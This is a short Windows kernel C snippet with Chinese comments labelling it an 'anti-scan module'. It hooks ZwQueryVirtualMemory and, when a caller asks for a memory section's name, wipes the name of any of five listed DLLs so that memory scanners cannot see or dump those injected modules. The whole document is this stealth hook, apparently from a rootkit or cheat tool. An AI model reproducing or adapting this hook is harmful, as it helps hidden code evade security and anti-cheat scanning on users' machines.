1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 | //反扫描模块 NTSTATUS __stdcall NewZwQueryVirtualMemory( IN HANDLE ProcessHandle, IN PVOID BaseAddress, IN ULONG MemoryInformationClass, OUT PVOID MemoryInformation, IN ULONG MemoryInformationLength, OUT PULONG ReturnLength ) { ZWQUERYVIRTUALMEMORY OldZwQueryVirtualMemory; NTSTATUS status; PUNICODE_STRING SectionName; WCHAR lpwzDllName[260] = {0}; //保护模块的名称 防止被dump内存上传 WCHAR lpAttackDll[5][260] = {L"1",L"2",L"3",L"4",L"5"}; OldZwQueryVirtualMemory = (ZWQUERYVIRTUALMEMORY)ZwQueryVirtualMemoryHookZone; status = OldZwQueryVirtualMemory( ProcessHandle, BaseAddress, MemoryInformationClass, MemoryInformation, MemoryInformationLength, ReturnLength ); if (status == STATUS_SUCCESS && MemoryInformationClass == MemorySectionName) { __try{ SectionName =(PUNICODE_STRING)MemoryInformation; if (ValidateUnicodeString(SectionName)) { if (SectionName->Buffer != NULL && SectionName->Length) { memcpy(lpwzDllName,SectionName->Buffer,SectionName->Length); if (wcsstr(lpwzDllName,lpAttackDll[0]) != 0 || wcsstr(lpwzDllName,lpAttackDll[1]) != 0 || wcsstr(lpwzDllName,lpAttackDll[2]) != 0 || wcsstr(lpwzDllName,lpAttackDll[3]) != 0 || wcsstr(lpwzDllName,lpAttackDll[4]) != 0) { //清零内存 memset(SectionName->Buffer,0,SectionName->MaximumLength); } } } }__except(1){ } } return status; } |